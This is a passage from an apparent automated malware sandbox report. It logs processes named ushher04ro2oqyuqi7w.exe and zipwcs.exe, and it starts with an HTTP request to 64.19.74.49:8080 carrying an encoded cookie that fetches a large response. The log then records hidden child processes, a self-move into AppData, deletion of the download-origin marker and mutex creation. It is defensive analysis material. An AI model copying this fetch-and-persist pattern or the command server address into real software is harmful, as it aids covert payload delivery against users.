|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 64.19.74.49, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = Cookie: 29033=GZCh4BS+b6m4PccPR4Ja4G3efi8tNGydiWoXJGO52qMqiRAkrK5Yg0BPQoqrp2edHZBm2btI1TdVqRC/tBdy9vJC8rZxL5TKqiKQ3zkNEj0kPKjYBvx9LeyF/bQvt3/hByXEgTYn7/woHwgLDFT2dH+mqqCRqPsVKZ601PJIn3vSJgBNXPBne8I0g46KB8aV47kWPa58qKINrk18bgv1sjdM7GheK/s+bs8Q410asdmTQgvwvEaYSzVnN2Wqflh9Ks23ObA/1DnENJku5knYZ3MCpOQAPmsUmvZpke8QKUug66tBhE90E31p/OcGui3fuPy3czJX2U9gNvJln5reIKDOYTd7ereNi7bHslL+dKsqI4HJSlRNG27TREi58bgkOylBtmOpnfq2JWaf8J5HGKi1tE66CmrQR92AzV312Cv6PJirpJ02E2dVrpDTA3JcbGCJ2OfIQcrMdRWLziZFFXJzervQwXFw/9r3gheKE7+aZwCKuTT+bV0VYImCPYrTAu62djKsTllhton6h2AhXq5zUhmy+KnxVXGmw5Sm+WPEkP2Qfo+cSc03KWhvOkF6byp1ryKcakdSJozx/9PwV2WUYwcDvJ/b/qIKkxKlQccqqCPyzAPufJu2XOc6mtsZoxUMkEaADzDgoVNct40p0u9We6/PV8DqX6jnOe1df8N0SkTkSFXZ9bMETXjI6HthURLGyim+cDcZDKukEGW2SkOHwJRyTPTbflTpP2lSzBGDLC8r, url = 64.19.74.49 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 112804, size_out = 112804 |
|
1 | |
| Close Session | - |
|
2 |
Process #10: ushher04ro2oqyuqi7w.exe
31
0
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\users\aetadzjz\appdata\local\zipwcs\ushher04ro2oqyuqi7w.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\zipwcs\ushHer04rO2OqyUQI7w.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:51, Reason: Child Process |
| Unmonitor | End Time: 00:01:53, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x89c |
| Parent PID | 0x88c (c:\users\aetadzjz\appdata\local\zipwcs\zipwcs.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
898
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x00328fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x00349fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x00369fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0038ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00397fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| ushher04ro2oqyuqi7w.exe | 0x00400000 | 0x00424fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x004effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000520000 | 0x00520000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000620000 | 0x00620000 | 0x007a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007b0000 | 0x007b0000 | 0x00930fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000940000 | 0x00940000 | 0x01d3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01d40000 | 0x0200efff | Memory Mapped File | r |
|
|
|
- |
| wow64win.dll | 0x75020000 | 0x7507bfff | Memory Mapped File | rwx |
|
|
|
- |
| pdh.dll | 0x750f0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752d0000 | 0x752d7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\zipwcs\ushHer04rO2OqyUQI7w.exe | os_pid = 0x584, creation_flags = CREATE_HIGH_PRIORITY_CLASS, show_window = SW_HIDE |
|
1 |
Module (16)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x76540000 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\zipwcs\ushher04ro2oqyuqi7w.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\zipwcs\ushHer04rO2OqyUQI7w.exe, size = 260 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fda8 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fdb8 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76551700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76551809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x765517ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7656eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x765511c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76555929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x765511f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x765f6aa8 |
|
1 |
Keyboard (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = 772, result_out = 0 |
|
11 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
1 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = PEM88C |
|
1 | |
| Create | mutex_name = PEM89C |
|
1 |
Process #11: ushher04ro2oqyuqi7w.exe
59
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\users\aetadzjz\appdata\local\zipwcs\ushher04ro2oqyuqi7w.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\zipwcs\ushHer04rO2OqyUQI7w.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:51, Reason: Child Process |
| Unmonitor | End Time: 00:01:58, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x584 |
| Parent PID | 0x89c (c:\users\aetadzjz\appdata\local\zipwcs\ushher04ro2oqyuqi7w.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
344
0x
274
0x
8CC
0x
64C
0x
C8
0x
23C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00228fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x00249fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00269fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00277fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00270fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x0039ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a1fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x003b0000 | 0x003b0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| ushher04ro2oqyuqi7w.exe | 0x00400000 | 0x00424fff | Memory Mapped File | rwx |
|
|
|
|
| private_0x0000000000430000 | 0x00430000 | 0x004dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x00471fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00480fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.1.db | 0x00490000 | 0x00493fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000490000 | 0x00490000 | 0x00496fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x004dffff | Private Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db | 0x004e0000 | 0x004fffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x00500fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x006eefff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006f0000 | 0x006f0000 | 0x006f1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x00700000 | 0x00703fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x008a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x00a30fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a40000 | 0x00a40000 | 0x01e3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01e40000 | 0x0210efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002110000 | 0x02110000 | 0x0220ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002210000 | 0x02210000 | 0x0224ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002250000 | 0x02250000 | 0x0234ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002350000 | 0x02350000 | 0x02742fff | Pagefile Backed Memory | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x02750000 | 0x0277ffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x02780000 | 0x02783fff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x02790000 | 0x027f5fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002800000 | 0x02800000 | 0x02800fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002800000 | 0x02800000 | 0x0283ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002840000 | 0x02840000 | 0x0293ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002940000 | 0x02940000 | 0x0297ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002980000 | 0x02980000 | 0x02a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a80000 | 0x02a80000 | 0x02abffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ac0000 | 0x02ac0000 | 0x02bbffff | Private Memory | rw |
|
|
|
- |
| propsys.dll | 0x74ae0000 | 0x74bd4fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x74ca0000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74ce0000 | 0x74e7dfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74fa0000 | 0x7501ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x75020000 | 0x7507bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x75090000 | 0x750b0fff | Memory Mapped File | rwx |
|
|
|
- |
| pdh.dll | 0x750f0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75220000 | 0x75235fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x75290000 | 0x752a2fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752d0000 | 0x752d7fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x752f0000 | 0x752fdfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75520000 | 0x75531fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75540000 | 0x755cefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75660000 | 0x756b6fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75b10000 | 0x75b54fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x75d70000 | 0x75f0cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76160000 | 0x762bbfff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x762c0000 | 0x762e6fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x764b0000 | 0x76532fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76770000 | 0x773b9fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\zipwcs\ | type = file_attributes |
|
1 | |
| Move | C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe | source_filename = C:\Users\aETAdzjz\AppData\Local\zipwcs\ushHer04rO2OqyUQI7w.exe |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\mddefwmerged\mddefwmerged.exe | - |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe:Zone.Identifier | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe | os_pid = 0x514, show_window = SW_HIDE |
|
1 |
Module (20)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x76540000 |
|
1 | |
| Load | user32.dll | base_address = 0x76380000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x75390000 |
|
1 | |
| Load | shell32.dll | base_address = 0x76770000 |
|
1 | |
| Get Handle | c:\users\aetadzjz\appdata\local\zipwcs\ushher04ro2oqyuqi7w.exe | base_address = 0x400000 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\zipwcs\ushher04ro2oqyuqi7w.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\zipwcs\ushHer04rO2OqyUQI7w.exe, size = 260 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fda8 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fdb8 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76551700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76551809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x765517ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7656eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x765511c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76555929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x765511f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x765f6aa8 |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = LDWCN705BA84C, wndproc_parameter = 0 |
|
1 |
Keyboard (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = 772, result_out = 0 |
|
11 |
System (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Get Time | type = Ticks, time = 162116 |
|
2 | |
| Get Time | type = Ticks, time = 163130 |
|
1 | |
| Get Time | type = Ticks, time = 164144 |
|
1 | |
| Get Time | type = Ticks, time = 165158 |
|
1 | |
| Get Time | type = Ticks, time = 166172 |
|
1 | |
| Get Time | type = Ticks, time = 167186 |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 |
Mutex (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = PEM89C |
|
1 | |
| Create | mutex_name = Global\I705BA84C |
|
1 | |
| Create | mutex_name = Global\M705BA84C |
|
1 | |
| Release | mutex_name = Global\I705BA84C |
|
1 |
Process #12: zipwcs.exe
31
0
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\users\aetadzjz\appdata\local\zipwcs\zipwcs.exe |
